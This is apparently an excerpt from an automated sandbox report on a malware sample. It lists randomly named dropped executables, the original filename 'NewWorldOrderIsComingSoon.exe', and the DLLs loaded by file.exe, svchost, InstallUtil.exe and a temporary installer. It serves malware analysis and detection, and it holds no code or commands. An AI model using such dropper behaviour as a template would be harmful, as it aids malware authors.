                    Source: h9Cux8w1auuBknjQZWKFquuD.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: r8s8W6BwO9zs4dtTCMpyOk6D.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: HVNYeIaPfKI1PhwDbNEQTtKf.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: J8LomUCEiQeMvIGqlnqM0LZ5.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: BQEn0lhfn4Y5OIYegdFv1wu3.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: aY7RTHx8jQe0LE98Ey8c4ndl.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: arAAytPAHIBxEUE8lqY8jFUv.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: Ca4kQMpVXP8DY5HQ8cbuvFmH.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: file.exeStatic PE information: No import functions for PE file found
                    Source: file.exe, 00000000.00000000.2017927246.000002C8B7E02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewWorldOrderIsComingSoon.exeT vs file.exe
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptnet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: ncrypt.dll
